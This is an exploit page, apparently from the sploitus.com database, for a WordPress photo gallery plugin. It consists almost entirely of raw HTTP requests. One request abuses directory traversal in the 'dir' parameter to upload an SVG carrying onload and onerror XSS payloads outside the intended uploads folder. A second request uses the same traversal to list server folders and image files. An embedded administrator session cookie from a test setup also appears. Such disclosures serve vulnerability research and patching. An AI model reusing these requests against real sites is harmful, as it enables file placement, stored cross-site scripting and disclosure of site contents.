Share
## https://sploitus.com/exploit?id=WPEX-ID:C8917BA2-4CB3-4B09-8A49-B7C612254946
- The below requests will put the svg_to_xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/
POST /wordpress/wp-admin/admin-ajax.php?bwg_nonce=77c06f6311&action=bwg_upl&dir=/....//....//....// HTTP/1.1
Host: {host}
Content-Length: 2845
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysAMZOiWPOOk33DG8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Cookie: {cookie}
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="bwg_nonce"
70ebb31e6c
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=0&bwg_height=0&callback=bwg_add_image&bwg_nonce=b37a4be11b
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_width"
500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_height"
500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_width"
1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_height"
1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="task"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="extensions"
jpg,jpeg,png,gif,svg
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="callback"
bwg_add_image
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_by"
date_modified
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_order"
desc
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="items_view"
thumbs
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="dir"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_names"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_namesML"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_new_name"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="new_dir_name"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_task"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_files"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_src"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_dest"
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="files[]"; filename="svg_to_xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<img src='1' onerror='alert()' />
</svg>
------WebKitFormBoundarysAMZOiWPOOk33DG8--
- The below requests will list the entire folder & image file in the system.
POST /wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=800&bwg_height=550&callback=bwg_add_preview_image&bwg_nonce=b37a4be11b& HTTP/1.1
Host: localhost
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7C7fee9203d7bfbbc77f90d0a9b9872d0ea8bf7b1ccfa9f43ced48936bbc98b05c; wordpress_test_cookie=WP%20Cookie%20check; pvc_visits[0]=1677949198b1; wp_lang=en_US; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7Cb76a29cd3f196f659d63ecb2bf9c7bb4d158aa0b03f274379bf45e4162030338; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1677909222; tk_ai=%2B8CRtWYwxLjZLIFmx4D5%2FaoH; redux_current_tab=settings; redux_current_tab_get=settings; redux_current_tab_wpml_settings=1; wordpress_apbct_antibot=0050792dac2aebc2f8264b54205dbd73de813c365ef1d1d92377c094cf3bc336; ct_paused_spam_check=0; apbct_check_comments_offset=200; ct_check_users__amount=100; ct_paused_users_check=0; apbct_check_users_offset=0
bwg_nonce=70ebb31e6c&dir=/....//....//....//....//....//....//